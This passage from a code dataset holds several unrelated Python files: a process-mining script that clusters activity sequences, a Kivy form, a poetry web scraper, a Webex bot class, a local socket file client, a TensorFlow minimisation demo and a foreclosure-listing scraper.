It labels total duration as\n# \"throughput time\", total time elapsed as \"operation time\", and the\n# difference of the two as \"waiting time.\" It also stores the names of\n# each activity in the order their usage is recorded.\n######################################################\n\n# get number of resources\nm = len(ids[2])\n\n# create a matrix to store (m + 4) * s resource label matrices of different shapes\nlabel_per = [None] * (m + 4) * seq_ind.shape[1]\nmat_per = np.zeros(shape=(n, (m + 4) * seq_ind.shape[1]), dtype=object)\n\n# for all unique sequences of length 2 to k\nfor i in range(s):\n for j in range(len(label_s[i])):\n # get indices of all occurrences of unique sequence rows_s\n # (i.e. unique IDs of cases that contain occurrences)\n ind = np.argwhere(seq_ind[:, rows_s] > -1)\n\n # get length of this unique sequence\n l = len(label_s[i][j])\n\n # get number of occurrences of this sequence across all cases\n k = len(ind)\n\n # store four entries in label_per corresponding to this sequence\n label_per[(rows_s * (m + 4)) + 1] = 'throughput time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 2] = 'operation time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 3] = 'waiting time: ' + str(label_s[i][j])\n label_per[(rows_s * (m + 4)) + 4] = '# of resources: ' + str(label_s[i][j])\n\n # for all resources x, add another entry in label_per corresponding\n # to this sequence with a label corresponding to this resource\n for x in range(m):\n label_per[(rows_s * (m + 4)) + 4 + x] = 'resource ' + str(ids[2][x]) + ' used : ' + str(label_s[i][j])\n\n # for all cases which contain occurrences of this sequence\n for x in range(k):\n\n # ind[x][0] = unique ID of case x\n # seq_ind[ind[x][0], rows_s] = index of occurrence of this sequence in case x\n # trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s]] = absolute starting point of this sequence\n # trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s] + l - 2] + 1] = absolute ending point of this sequence\n # (i.e. 
bnds is the start and end index of this sequence across all cases)\n                bnds = [trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s]],\n                        trace_idx[ind[x][0], seq_ind[ind[x][0], rows_s] + l - 1] + 1]\n\n                # get range of start and end times over this sequence\n                start = constrain(ids[3], bnds)\n                end = constrain(ids[4], bnds)\n\n                # get total duration of sequence in days, save to mat_per\n                max_stop = np.max(end)\n                min_start = np.min(start)\n                diff = dt.fromordinal(max_stop) - dt.fromordinal(min_start)\n                diff = diff.days\n\n                mat_per[ind[x][0], (rows_s * (m + 4))] = diff\n\n                # get total time elapsed during sequence in days, save to mat_per\n                sum = 0\n                for y in range(len(start)):\n                    diff = dt.fromordinal(end[y]) - dt.fromordinal(start[y])\n                    diff = diff.days\n                    sum += diff\n\n                mat_per[ind[x][0], (rows_s * (m + 4)) + 1] = sum\n\n                # get difference between time duration and time elapsed, save to\n                # mat_per (read back this sequence's own duration and elapsed\n                # columns, not columns 0 and 1 of the whole matrix)\n                mat_per[ind[x][0], (rows_s * (m + 4)) + 2] = mat_per[ind[x][0], (rows_s * (m + 4))] - mat_per[ind[x][0], (rows_s * (m + 4)) + 1]\n\n                # get total resources used by this sequence\n                res = constrain(idxs[2], bnds)\n\n                # get unique resources used by this sequence\n                # (np.unique takes only the array here; passing bnds as a second\n                # positional argument would switch on return_index and break len())\n                indices = np.unique(res)\n\n                # get number of different resources used by this sequence, save to mat_per\n                mat_per[ind[x][0], (rows_s * (m + 4)) + 3] = len(indices)\n\n                # for all resources\n                for y in range(m):\n                    # get count of resource y in this sequence, save to mat_per\n                    sum = 0\n                    for z in range(len(res)):\n                        if res[z] == y:\n                            sum += 1\n\n                    mat_per[ind[x][0], (rows_s * (m + 4)) + 4 + y] = sum\n\n        # increment count of total rows in label_s (once per unique sequence)\n        rows_s += 1\n\n######################################################\n# PART 6: Create trap membership dictionary\n# > Create trap membership dictionary with 15 + s1 + s2 + 2s3\n# rows, where s1, s2, s3 are the number of unique reasons,\n# activities, and resources, respectively. 
The content of\n# the rows:\n# Rows 1 to 9): store possible quantifiers ('short',\n# 'medium', 'long') for each type of time value\n# ('throughput', 'operating', 'waiting'), as well as the\n# trap bounds that delineate them\n# Rows 10 to s1): store trap bounds for each unique reason\n# Rows s1 + 1 to s1 + 7): store possible quantifiers ('small',\n# 'medium', 'large') for each type of activity/resource\n# as well as the trap bounds that delineate them\n# Rows s1 + 7 to s2): store trap bounds for each unique activity\n# Rows s2 to s3): store trap bounds for each unique resource\n# Rows s3 to 2s3): store labels for each unique resource\n######################################################\n\n# get number of unique reasons, activities, and resources\ns1 = len(ids[5])\ns2 = len(ids[1])\ns3 = len(ids[2])\n\n# create space for 9 quantifiers related to time,\n# info related to each reason, 6 quantifiers related\n# to activities/reasons, info related to each activity,\n# and two sets of info related to each resource\ns = 9 + s1 + 6 + s2 + (2 * s3)\n\n# columns: labels, quantifiers, bounds, norm\ndct = []\nfor row in range(s):\n    dct += [[0] * 4]\n\n# establish time quantifiers and trap bounds for them\nlen_mat = ['short ', 'medium ', 'long ']\ntime_mat = [[0, 0, 30, 60], [30, 60, 150, 200], [150, 200, 1000, 1000]]\n\n# fill in labels, quantifiers, and trap bounds\n# for throughput time, operating time, waiting time\n# (the quantifier string is built from this row's own label,\n# e.g. 'short throughput time')\nfor i in range(9):\n    dct[i][0] = labels[int(i / 3) + 1]\n    dct[i][1] = len_mat[i % 3] + str(dct[i][0])\n    dct[i][2] = time_mat[i % 3]\n\n# fill in labels, quantifiers, and trap bounds\n# for all reasons\nfor i in range(s1):\n    dct[i + 9][0] = labels[4]\n    dct[i + 9][1] = 'reason was ' + str(ids[5][i])\n    dct[i + 9][2] = [i - 0.2, i - 0.1, i + 0.1, i + 0.2]\n\ntime_mat = [[0, 0, 2, 4], [2, 4, 8, 10], [8, 10, 20, 20]]\nlen_mat = ['small ', 'medium ', 'large ']\n\n# number of activities\nfor i in range(10, 13):\n    dct[s1 + i - 1][0] = labels[5]\n    dct[s1 + i - 1][1] = len_mat[i % 3 - 1] + labels[5]\n    dct[s1 + i - 1][2] = time_mat[i % 3 - 1]\n\ntime_mat = [[0, 0, 0.2, 0.3], [0.2, 0.3, 0.5, 0.7], [0.5, 0.7, 1, 1]]\n\n# number of resources\nfor i in range(13, 16):\n    dct[s1 + i - 1][0] = labels[6]\n    dct[s1 + i - 1][1] = len_mat[i % 3 - 1] + labels[6]\n    dct[s1 + i - 1][2] = time_mat[i % 3 - 1]\n    dct[s1 + i - 1][3] = 1\n\n# number of times action X was performed\nfor i in range(s2):\n    dct[s1 + i + 15][0] = labels[7 + i]\n    dct[s1 + i + 15][1] = str(ids[1][i]) + ' '\n    dct[s1 + i + 15][2] = [0.8, 0.9, 100, 100]\n\n# number of times resource X was used\nfor i in range(s3):\n    dct[s1 + s2 + i + 15][0] = labels[7 + s2 + i]\n    dct[s1 + s2 + i + 15][1] = str(ids[2][i]) + ' '\n    dct[s1 + s2 + i + 15][2] = [0.8, 0.9, 100, 100]\n\nfor i in range(s3):\n    dct[s1 + s2 + s3 + i + 15][0] = labels[7 + s2 + i]\n    dct[s1 + s2 + s3 + i + 15][1] = str(ids[2][i]) + ' many times'\n    dct[s1 + s2 + s3 + i + 15][2] = [0.25, 0.3, 1, 1]\n    dct[s1 + s2 + s3 + i + 15][3] = 1\n\n######################################################\n# PART 8: Compute trap membership matrix\n# > For each entry of the trap membership dictionary\n# created above, get the corresponding info from\n# the case info matrix and compute the trap membership\n# value of this info for the given bounds, storing\n# it in a new trap membership matrix. 
For example,\n# the first entry of the trap membership dictionary\n# has bounds for \"throughput time,\" so get the\n# throughput time for every case (column #2 of the\n# case info matrix) and calculate the trap membership\n# of each of these times in the bounds in the entry.\n######################################################\n\nn = len(mat)\nmem = np.zeros(shape=(n, s), dtype=np.float_)\n\n# for all entries in dct\nfor i in range(s):\n # collect info corresponding to this entry from case info matrix\n pom = []\n\n for j in range(len(labels)):\n if labels[j] == dct[i][0]:\n for k in range(len(mat[:])):\n pom.append(mat[:, j][k])\n\n # if entry has norm flag (i.e. entry is resource entry),\n # divide all info by number of activities in corresponding case\n if dct[i][3] == 1:\n for j in range(len(pom)):\n pom[j] = pom[j] / float(mat[j][5])\n\n # store trap membership of case info in trap bounds for this entry\n mem[:, i] = trapmf(pom, dct[i][2])\n\n######################################################\n# PART 9: Compute representative sequence distance array\n# > Find all representative unique sequences (that is,\n# all unique sequences that have a trap membership\n# of greater than the threshold value of 0.7 in any\n# of the three global quantifiers). Then create a\n# s x s matrix where s is the number of representative\n# sequences and row i, column j is the distance between\n# the ith and the jth representative sequence.\n######################################################\n\n# label, bounds\nquant = []\nfor row in range(3):\n quant += [[0] * 2]\n\n# create global quantifier labels and bounds\nlabels_q = ['many', 'most', 'almost all']\npar_q = [[0.3, 0.5, 1, 1], [0.45, 0.7, 1, 1], [0.7, 0.9, 1, 1]]\n\nfor i in range(3):\n quant[i][0] = labels_q[i]\n quant[i][1] = par_q[i]\n\n# get array of average trap memberships of the least distances for\n# each unique sequence in the given bounds\n# (i.e. an array of the average similarity for each sequences to others)\ntp = []\nfor i in range(len(mat_s[0])):\n tp.append(np.sum(trapmf(mat_s[:, i], [0.2, 1, 1, 1])) / n)\n\ntp3 = np.tile(tp, (3, 1))\n\n# get trap membership of similarity metric in each\n# set of quantifier bounds\n# (i.e. 
see whether similarity metric qualifies as 'many', 'most',\n# or 'almost all')\nfor i in range(3):\n tp3[i, :] = trapmf(tp, quant[i][1])\n\n# get logical array for each sequence that is 1 if\n# the sequence fits into any quantifier ('many', 'most', 'almost all')\n# with a membership greater than the threshold of 0.7,\n# 0 if it does not fit into any quantifier with this value\ntp0 = []\nfor i in range(tp3.shape[1]):\n max_col = tp3[:, i].max(axis=0)\n tp0.append(1 if max_col > 0.7 else 0)\n\nST = []\nLST = []\ntp3_new = []\n\n# fill ST with all the columns of least distances for\n# sequences that scored 0.7 or higher on at least\n# one quantifier, and condense tp3 to these columns\n# as well (removing sequences that are not\n# sufficiently representative, indicating that they\n# scored below 0.7 on all quantifiers)\nfor i in range(len(tp0)):\n if tp0[i] == 1:\n ST.append(mat_s[:, i])\n tp3_new.append(tp3[:, i])\n\n# fill LST with the representative sequences themselves\nl = 0\nfor i in range(len(label_s)):\n for j in range(len(label_s[i])):\n if tp0[l] == 1:\n LST.append(label_s[i][j])\n\n l += 1\n\ntp3 = tp3_new\n\n# get number of representative sequences\nk = len(LST)\n\n# get lengths of representative sequences\nsizes = np.zeros(shape=(k), dtype=np.float_)\n\nfor i in range(k):\n sizes[i] = len(LST[i])\n\nD = np.zeros(shape=(k, k), dtype=np.float_)\n\n# get array of distances between all representative strings\nfor i in range(k - 1):\n for j in range(i, k):\n norm = max(sizes[i], sizes[j])\n a = []\n b = []\n for l in range(len(LST[i])):\n a.append(chr(ord('a') + LST[i][l]))\n for l in range(len(LST[j])):\n b.append(chr(ord('a') + LST[j][l]))\n\n # in D[i, j] put edit distance between string i and string j\n D[i, j] = levenshtein(a, b) / float(norm)\n D[j, i] = D[i, j]\n\n######################################################\n# PART 10: Cluster\n# > Create a pairwise distance matrix from the representative\n# unique sequence distance matrix, and use it to create\n# a hierarchical cluster linkage.\n######################################################\n\n# create pairwise distance matrix of distances in D\nXX = eng.squareform(matlab.double(D.tolist()))\n\n# create cluster hierarchy of pairwise clusters\nZ = eng.linkage(XX)\n\ncp = np.zeros(shape=(k), dtype=np.float_)\n\n######################################################\n# PART 11: Correlation, Medioid Selection\n# > Do clustering with cluster counts from 2 to k + 1\n#\n# > Find the optimal cluster count, meaning the\n# cluster count that produces the greatest\n# Spearman/Pearson correlation\n#\n# > Repeat clustering with optimal cluster count\n#\n# > Find medioid of each cluster by creating a matrix\n# of distances between each cluster and finding the\n# sequence which had the summed least distance overall\n# from other sequences in the cluster\n#\n# > Sort each medioid into a quantifier based on its\n# trap similarity metric meeting the threshold of\n# 0.7 for 'almost all', 'most' if not that,\n# and 'many' if not either of those\n######################################################\n\n# do (SL & NERF) spearman and pearson correlations\nfor corr in range(2):\n print('\\n#############################')\n if corr == 0:\n print('Optimal Cluster Count by SL SPEARMAN Correlation')\n elif corr == 1:\n print('Optimal Cluster Count by SL PEARSON Correlation')\n elif corr == 2:\n print('Optimal Cluster Count by NERF SPEARMAN Correlation')\n else:\n print('Optimal Cluster Count by NERF PEARSON Correlation')\n 
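# note: range(2) only produces corr values 0 and 1 (the SL variants),\n    # so the two NERF branches above are currently unreachable\n    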
print('#############################')\n\n for i in range(2, k + 1):\n # go down in cluster linkage tree until i clusters are found,\n # clustering all the representative sequences\n cl = eng.cluster(Z, 'maxclust', i)\n\n U = np.zeros(shape=(i, k), dtype=np.float_)\n\n # denote which cluster each of the k representative sequences is in\n # by marking the corresponding index in the row\n # associated with that cluster as 1\n for j in range(k):\n U[int(cl[j][0]) - 1][j] = 1\n\n # format the pairwise distance and cluster membership matrices\n N2 = len(D) * len(D)\n Us = np.transpose(U).dot(U)\n M = np.max(Us)\n Us = 1 - Us / M\n\n # do either spearman or pearson correlation on the pairwise distance\n # and cluster membership matrices\n if corr == 0:\n cp[i - 1] = abs(scipy.stats.spearmanr(np.reshape(D, (N2, 1)), np.reshape(1 - Us / M, (N2, 1)))[0])\n else:\n cp[i - 1] = abs(scipy.stats.pearsonr(np.reshape(D, (N2, 1)), np.reshape(1 - Us / M, (N2, 1)))[0])\n\n # get number of clusters which created the greatest correlation\n # (i.e. get the index i with the greatest correlation that corresponds\n # to the clustering with i clusters)\n c = int(cp.argmax(axis=0)) + 1\n\n listSL = []\n for row in range(c):\n listSL += [[0] * 3]\n\n # cluster with the greatest correlation number of clusters\n cl = eng.cluster(Z, 'maxclust', c)\n cl = [int(e[0]) - 1 for e in cl]\n\n print(cl)\n\n for i in range(c):\n # get the least distances matrices of the sequences in each cluster\n STi = [];\n for j in range(len(cl)):\n if cl[j] == i:\n STi.append(ST[j])\n\n # get the representative sequences for each cluster\n LSTi = [];\n for j in range(len(cl)):\n if cl[j] == i:\n LSTi.append(LST[j])\n\n # get the number of sequences in each cluster\n sum = 0\n for j in range(len(cl)):\n if cl[j] == i:\n sum += 1\n\n Di = np.zeros(shape=(sum, sum), dtype=np.float_)\n\n # make a matrix of distances between all sequences in\n # the current cluster (matrix is a one element matrix\n # containing 0 if only one sequence is in the cluster)\n row = 0\n for j in range(len(cl)):\n if cl[j] == i:\n col = 0\n for l in range(len(cl)):\n if cl[l] == i:\n Di[row][col] = D[j][l]\n col += 1\n row += 1\n\n # get index of min column sum\n # (i.e. sequence for which total distance sum was least,\n # the medioid)\n ix = np.argmin(Di.sum(axis=0))\n\n # store the medioid\n listSL[i][1] = LSTi[ix]\n\n # store trap similarity metric of each sequence in this cluster\n ti = [];\n for j in range(len(cl)):\n if cl[j] == i:\n ti.append(tp3[j])\n\n # get trap similarity metric of the medioid\n ti = ti[ix]\n\n # sort the medioid sequence into a quantifier\n # ('many', 'most', 'almost all')\n # and store the trap similarity metric of the\n # medioid\n if ti[2] >= 0.7:\n listSL[i][0] = quant[2][0]\n listSL[i][2] = ti[2]\n elif ti[1] >= 0.7:\n listSL[i][0] = quant[1][0]\n listSL[i][2] = ti[1]\n elif ti[0] >= 0.7:\n listSL[i][0] = quant[0][0]\n listSL[i][2] = ti[0]\n\n######################################################\n# PART 12: Output\n# > Print each medioid and its quantifier\n#\n# > Prune medioids that are contained within other\n# medioids\n#\n# > Print each remaining medioid (the contents\n# of the medioid) and its quantifier\n######################################################\n\n m = c\n\n # for each cluster, print quantifier of that cluster's medioid\n # (i.e. most [sequences] are like 1 5 2 . . 
.)\n    for i in range(m):\n        print(str(listSL[i][0]), 'are like', listSL[i][1])\n\n    print('after pruning')\n\n    for i in range(m - 1):\n        for j in range(i + 1, m):\n            # if the quantifiers of two medioids are the same\n            if listSL[i][0] == listSL[j][0]:\n                # build the letter-string form of both medioid sequences\n                pat_a = ''.join(chr(ord('a') + e) for e in listSL[j][1])\n                pat_b = ''.join(chr(ord('a') + e) for e in listSL[i][1])\n\n                # if medioid i is contained within medioid j,\n                # set the trap similarity of medioid i to 0\n                sub_str = pat_a.find(pat_b)\n                if sub_str != -1:\n                    listSL[i][2] = 0\n\n    # get array of trap similarity metrics of medioids\n    list1 = []\n    for i in range(len(listSL)):\n        list1.append(listSL[i][2])\n\n    # prune all medioids with trap similarity metric 0\n    # (i.e. medioids that are contained within other medioids)\n    listSL_new = []\n    for i in range(len(list1)):\n        if list1[i] > 0:\n            listSL_new.append(listSL[i])\n\n    listSL = listSL_new\n\n    # get number of remaining totally unique medioids\n    m = len(listSL)\n\n    # print quantifier and medioid (actual contents of medioid,\n    # not just symbolic abbreviation)\n    # (i.e. most cases contain sequences like {\n    #     Register\n    #     Appeal\n    #     Archive\n    # })\n    for i in range(m):\n        print(listSL[i][0], 'cases contain sequence like {')\n        list_len = len(listSL[i][1])\n        for j in range(list_len):\n            print('\\t', ids[1][listSL[i][1][j]])\n        print('}')\n\n    # store lists of medioids\n    if corr == 0:\n        listSL1 = listSL\n    else:\n        listSL2 = listSL\n\nexit()\n\n#################################################\n# SL Pearson\n\n# D_new = []\n# for i in range(len(D)):\n#     D_row = [float(e) for e in D[i]]\n#     D_new.append(D_row)\n\nk = len(LST)\nmm = 1.5\n\nprint(U)\nU = matlab.double(U.tolist())\n\nfor i in range(2, k + 1):\n    # D = matlab.double(D)\n\n    print(len(U), len(U[0]))\n    U = eng.nerfcm(U, i, mm, 0.0001)\n","sub_path":"summarization.py","file_name":"summarization.py","file_ext":"py","file_size_in_byte":41760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"153890209","text":"import kivy\nkivy.require('1.9.0')\n\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\n\nclass Caja1 (GridLayout):\n    def __init__(self,**kwargs):\n        super(Caja1, self).__init__(**kwargs)\n\n        self.cols = 1\n\n        self.inside = GridLayout()\n        self.inside.cols = 2\n\n        self.inside.add_widget(Label(text=\"Name: \"))\n        self.name = TextInput(multiline=False)\n        self.inside.add_widget(self.name)\n\n        self.inside.add_widget(Label(text=\"Last Name: \"))\n        self.lastName = TextInput(multiline=False)\n        self.inside.add_widget(self.lastName)\n\n        self.inside.add_widget(Label(text=\"Email: \"))\n        self.email = TextInput(multiline=False)\n        self.inside.add_widget(self.email)\n\n        self.add_widget(self.inside)\n\n        self.enviar = Button(text=\"Enviar\")\n        self.enviar.bind(on_press=self.pressed)\n        self.add_widget(self.enviar)\n\n    def pressed(self, instance):\n        name = self.name.text\n        last = self.lastName.text\n        mail = self.email.text\n\n        print(name, last, mail)\n\nclass MainApp(App):\n    title = \"Falsito truco\"\n    def build(self):\n        return Caja1()\n\nif __name__ == '__main__':\n    MainApp().run()","sub_path":"KIVY/src/techtim.py","file_name":"techtim.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"302620770","text":"import requests\nimport datetime\nfrom bs4 import BeautifulSoup\nimport csv\nimport 
multiprocessing\nimport time\n\n\nBAD_THRESHOLD = 1000\n\n\ndef load_bookmark():\n    with open('bookmark.txt', 'r') as f:\n        bookmark = f.read()\n    bookmark_splited = bookmark.split('/')\n\n    bookmark_year = int(bookmark_splited[-4])\n    bookmark_month = int(bookmark_splited[-3])\n    bookmark_day = int(bookmark_splited[-2])\n    bookmark_poem_number = int(bookmark_splited[-1])\n\n    page_dict = {\n        'year': bookmark_year,\n        'month': bookmark_month,\n        'day': bookmark_day,\n        'number': bookmark_poem_number,\n    }\n    return page_dict\n\n\ndef page_dict_to_url(page_dict):\n    url = f\"https://stihi.ru/{page_dict['year']}/{page_dict['month']:02}/{page_dict['day']:02}/{page_dict['number']}\"\n    return url\n\n\ndef flip_page(page_dict, count=1):\n    if page_dict['number'] <= count:\n        this_date = datetime.date(\n            page_dict['year'], page_dict['month'], page_dict['day'])\n        new_date = this_date - datetime.timedelta(1)\n\n        page_dict['year'] = new_date.year\n        page_dict['month'] = new_date.month\n        page_dict['day'] = new_date.day\n        page_dict['number'] = 5000\n\n    else:\n        page_dict['number'] -= count\n\n    return page_dict\n\n\ndef main():\n    current_page = load_bookmark()\n\n    bad_status_in_a_row_count = 0\n    while bad_status_in_a_row_count < BAD_THRESHOLD:\n\n        url = page_dict_to_url(current_page)\n        with open('bookmark.txt', 'w') as f:\n            f.write(url)\n\n        try:\n            response = requests.get(url)\n            status_code = response.status_code\n        except:\n            print(f'{url} | Connection error!')\n            status_code = 0\n\n        if status_code != 200:\n            bad_status_in_a_row_count += 1\n            print('Status code not 200. Initiating evasive maneuver')\n            current_page = flip_page(current_page, count=1000)\n\n        else:\n            bad_status_in_a_row_count = 0\n\n            soup = BeautifulSoup(response.text, 'html.parser')\n            poem = soup.find('div', {'class': 'text'})\n            if poem is None:\n                current_page = flip_page(current_page, count=100)\n                print(f'{url} | skipped')\n                continue\n            poem = poem.text.strip()\n            poem = poem.replace('\\n', '|').replace('\\xa0', '')\n\n            with open('poems.csv', 'a', encoding='utf-8') as f:\n                writer = csv.writer(f)\n                writer.writerow([poem])\n\n            current_page = flip_page(current_page)\n            print(f'{url} | ok')\n\n    else:\n        print('Finished or stuck, go check something')\n        return 0\n\n\nif __name__ == '__main__':\n\n    with open('bookmark.txt', 'r') as f:\n        bookmark_before = f.read()\n\n    p = multiprocessing.Process(target=main)\n    p.start()\n\n    while True:\n        time.sleep(10)\n        with open('bookmark.txt', 'r') as f:\n            bookmark_after = f.read()\n\n        if bookmark_before == bookmark_after and p.is_alive():\n            p.kill()\n            p.join(5)\n            p = multiprocessing.Process(target=main)\n            p.start()\n            print('RESTARTING PROCESS')\n        elif p.is_alive():\n            bookmark_before = bookmark_after\n","sub_path":"parser/poetry_scrapper.py","file_name":"poetry_scrapper.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"362594589","text":"from python_webex.v1.People import People\nfrom python_webex.v1.Room import Room\nfrom python_webex.v1.Webhook import Webhook\nfrom python_webex.v1.Message import Message\n\nimport os\nimport sys\n\n\nclass Bot(People, Room, Webhook, Message):\n\n    def __init__(self):\n\n        # declare headers and how the token will be gotten from the system\n        self.URL = \"https://api.ciscospark.com/\"\n        self.auth_token = os.getenv(\"auth_token\")\n\n        if self.auth_token is None:\n            sys.exit(\"'auth_token' not set in the environment variables\")\n\n        self.headers = {\n            \"Authorization\": \"Bearer \" + self.auth_token,\n            \"Content-Type\": \"application/json\"\n        }\n\n        # self.hears to function maps when a specific word is heard to a function\n        # for example, when one says 'hi' and you want to map it to say_hi() function\n        self.hears_to_function = {\n\n        }\n        self.attach_function = None\n\n    \"\"\"\n    decorator meant to do a specific action when called\n    \"\"\"\n    def on_hears(self, message_text):\n        def hear_decorator(f):\n            self.hears_to_function[message_text] = f\n            # return the function so the decorated name is not rebound to None\n            return f\n\n        return hear_decorator\n\n","sub_path":"python_webex/v1/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"371004490","text":"import socket  # Import socket module\nimport os\n\nfilelist = str()  # (unused placeholder)\nhost = socket.gethostname()  # Get local machine name\nport = 6008  # Reserve a port for your service.\n\n\n\n\n\nfor root,d_names,f_names in os.walk('./cl'):\n\n    for i in f_names:\n\n        g = open(\"./cl/\"+i)\n        print(i)\n        contents = str()\n        contents = i + \"|\" + g.read()\n\n        s = socket.socket()\n\n        s.connect((host, port))\n\n        s.send(contents.encode())\n\n        with open('./cl/received_file', 'wb') as f:\n\n            while True:\n\n                print('receiving data...')\n                data = s.recv(10000)\n                if not data:\n                    break\n                f.write(data)\n        s.close()\n        g.close()\n\nf = open(\"./cl/received_file\", \"r\")\n\nif f.mode == 'r':\n    contents = f.read()\n\nif len(contents) == 0:\n    print(\"No changes, safe to commit\")\n\nf.close()\n\nprint('Successfully get the file')\nprint('connection closed')","sub_path":"client-diff.py","file_name":"client-diff.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"10358289","text":"import tensorflow as tf\nimport numpy as np\nfrom datetime import datetime\nfrom pathlib import Path\n\nif __name__ == '__main__':\n    root_log_path = Path('.') / 'tf_logs' / f'run-{datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")}'\n    tf_x = tf.Variable(initial_value=-10.0, name='x')\n    with tf.name_scope('fct'):\n        # tf_y = 2 * tf.square(tf_x) - 5 * tf_x + 1\n        tf_y = tf.add(tf.subtract(tf.multiply(tf.constant(2.0, name='2'), tf.square(tf_x)),\n                                  tf.multiply(tf.constant(5.0, name='5'), tf_x)), tf.constant(1.0, name='1'))\n    tf_y_write = tf.Print(tf_y, [tf_x, tf_y])\n    optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)\n    tf_training = optimizer.minimize(tf_y, var_list=(tf_x,))\n    tf_y_summary = tf.summary.scalar('y', tf_y)\n    with tf.summary.FileWriter(str(root_log_path), tf.get_default_graph()) as f:\n        with tf.Session() as session:\n            session.run(tf_x.initializer)\n            for epoch in range(100):\n                session.run([tf_training, tf_y_write])\n                if epoch % 8 == 0:\n                    y_summary = tf_y_summary.eval()\n                    f.add_summary(y_summary, epoch)\n            print(tf_x.eval(), tf_y.eval())\n","sub_path":"tf_fct_min.py","file_name":"tf_fct_min.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"297090741","text":"import os\nimport pdb\nimport json\nimport numpy as np\nimport sys\nimport re\nimport shutil\nimport pandas as pd\nimport subprocess\nimport glob\nimport datetime\nfrom pytz import timezone\nfrom collections import Counter\nfrom df2google import DF2GoogleSpreadSheet\nfrom utils import (setup_logging,\n                   load_json,\n                   dump_json,\n                   load_json_or_create_if_empty)\nfrom excel_formulas import 
formulas_dict\n\npd.options.mode.chained_assignment = None\nwork_directory = os.path.dirname(os.path.abspath(__file__))\nlogfile = os.path.join(work_directory, 'logs', 'scraper_log.log')\nlogger = setup_logging(logfile)\n\nCWD = os.path.split(os.path.abspath(__file__))[0]\ndatabase_path = os.path.join(CWD, 'database')\ncsv_path = os.path.join(CWD, 'csv')\ntz = timezone('EST')\ndatetime_today = datetime.datetime.now(tz)\ntoday = datetime_today.strftime('%d_%m_%Y')\ntoday_time = datetime_today.strftime('%m-%d-%Y %H:%M')\n\nlogger.info(\"\\n{}<{}>{}\".format('*' * 25, today_time, '*' * 25))\n# sheet_name = datetime.datetime.now().strftime('Sheet_%m_%Y')\nsheet_name = 'Current'\nspread_sheet_id = '1kZvZn__U62ZMytci3je8cZ-TLNmRtdtuFI0avzqK75c' # '1uMa11jIIYyKMj2o73fgdHzYI5IUNdPzZzu_pocwoUx0'\nresult_file_path = os.path.join(CWD, 'result', 'final_result.csv')\nis_test_env = os.path.exists(os.path.join(CWD, '.test'))\nif is_test_env or sys.platform.startswith('win'):\n spread_sheet_id = '1uMa11jIIYyKMj2o73fgdHzYI5IUNdPzZzu_pocwoUx0'\n spread_sheet_id = '1kZvZn__U62ZMytci3je8cZ-TLNmRtdtuFI0avzqK75c'\n python_interpreter = sys.executable\nelse:\n python_interpreter = '/home/ec2-user/anaconda3/bin/python'\ncurrent_directory = os.path.split(os.path.realpath(__file__))[0]\nshapiro_file = os.path.join(current_directory, 'shapiro.py')\nbrockandscott_file = os.path.join(current_directory, 'brockandscott.py')\nhutchenslawfirm_file = os.path.join(current_directory, 'hutchenslawfirm.py')\n\nHOME_DIRECTORY = os.path.expanduser('~')\n\n# result_file_path = os.path.join('result', 'final_result.xlsx')\nboa_url = \"https://realestatecenter.bankofamerica.com/tools/marketvalue4.aspx?address=\"\nzillow_url = \"https://www.zillow.com/homes/\"\nmaps_url = \"https://www.google.com/maps/place/\"\nboa_substitute = lambda x: boa_url + str(x).replace(',', '').replace(' ', '+')\n\nzillow_substitute = lambda x: zillow_url + str(x).replace(',', '').replace(' ', '_') + '_rb'\n\nmap_substitute = lambda x: maps_url + str(x).replace(',', '').replace(' ', '+')\n\nremove_extra_spaces = lambda x: re.sub('\\s+', ' ', str(x))\n\n\ndef remove_dir(csv_path):\n if os.path.exists(csv_path):\n shutil.rmtree(csv_path)\n\n\ndef copy_gdrive_private_file():\n drive_private = os.path.join(HOME_DIRECTORY, '.gdrive_private')\n if not os.path.exists(drive_private):\n src = os.path.join('private', '.gdrive_private')\n dst = drive_private\n shutil.copy(src, dst)\n logger.info(\"gdrive_private file placed in HOME directory\")\n\n\ndef update_dfs(initial_df, updated_df, key):\n # initial_df = initial_df.sort_values('Source').reset_index().groupby('Num', group_keys=False).last()\n # updated_df = updated_df.sort_values('Source').reset_index().groupby('Num', group_keys=False).last()\n initial_df = initial_df.set_index(key)\n updated_df = updated_df.set_index(key)\n\n initial_df.update(updated_df) # ERROR\n initial_df.reset_index(inplace=True)\n initial_df['Updated Date'] = today_time\n return initial_df\n\n\ndef parse_bid_date(date):\n try:\n return ' '.join(re.compile('(\\d+?/\\d+?/\\d+?)[\\s-]*(\\d+?:\\d{2}).*').search(date).groups())\n except:\n return ' '.join(re.compile('(\\d+?/\\d+?/\\d+)[\\s-]*').search(date).groups())\n\n\ndef execute_scraping_script(scriptname, county=None, state=None, sales_type=None):\n cmd_args = [python_interpreter, scriptname]\n if county:\n cmd_args.append(county)\n if state:\n cmd_args.append(state)\n if sales_type:\n cmd_args.append(sales_type)\n\n cmd = ' '.join(cmd_args)\n logger.info(\"Executing `{}`\".format(cmd))\n 
